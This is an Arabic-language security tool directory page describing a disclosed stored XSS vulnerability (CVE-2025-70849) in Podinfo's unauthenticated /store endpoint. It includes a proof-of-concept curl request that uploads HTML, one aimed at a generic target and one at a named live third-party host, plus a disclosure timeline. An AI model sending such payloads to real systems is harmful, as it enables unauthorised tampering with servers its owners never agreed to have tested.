Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-70849 — CVE-2025-70849: ثغرة XSS مخزنة في Podinfo | Kitploit
أدوات/GitHubGitHub/deaprojects/cve-2025-70849
تحليل الثغرات الأمنيةالاستغلالأمن الويباختبار الاختراقالتعلم والتعليم
GitHubdeaprojects/cve-2025-70849

CVE-2025-70849

CVE-2025-70849: ثغرة XSS مخزنة في Podinfo

عرض المستودع
1منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-70849: ثغرة XSS مخزنة في Podinfo

ملخص

تم تحديد ثغرة أمنية (CWE-79) في Podinfo، وهو تطبيق ويب لتوضيح الخدمات المصغرة لـ Kubernetes. تسمح ميزة /store للمستخدمين غير المصادق عليهم بتحميل محتوى HTML/JS عشوائي، مما يؤدي إلى XSS مخزنة.

تفاصيل الثغرة

  • معرف CVE: CVE-2025-70849
  • المنتج: Podinfo
  • الموضع المتأثر: /store
  • نوع الثغرة: XSS مخزنة (Stored Cross-Site Scripting)
  • الإصدارات المتأثرة: <= 6.10.0

إثبات المفهوم (PoC)

  1. أرسل الحمولة الخبيثة:
    root@kitploit:~
    curl -X POST https://target/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'
    
    مثال مع هدف حي:
    root@kitploit:~
    curl -X POST https://podinfo.xcr.preprod55.prepd.eastus.kaas.sws.siemens.com/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'
    
صورة
  1. الوصول إلى التجزئة المرتجعة: https:///store/

    مثال: https://podinfo.xcr.preprod55.prepd.eastus.kaas.sws.siemens.com/store/8c1591e1b1e025067a2d73c0853b9a76bd8fc91a

    صورة

الجدول الزمني

  • الاكتشاف: سبتمبر 2025
  • إخطار البائع: 25 أكتوبر 2025
  • استجابة البائع: تم الإقرار؛ وأشار إلى عدم وجود جدول زمني حالي للإصلاح.
  • الإفصاح العام: فبراير 2026

إخلاء مسؤولية هذا البحث لأغراض تعليمية فقط.

شكر لـ :

Kazi Sabbir |

الخطورة: متوسطة 6.4

تنزيل الأداة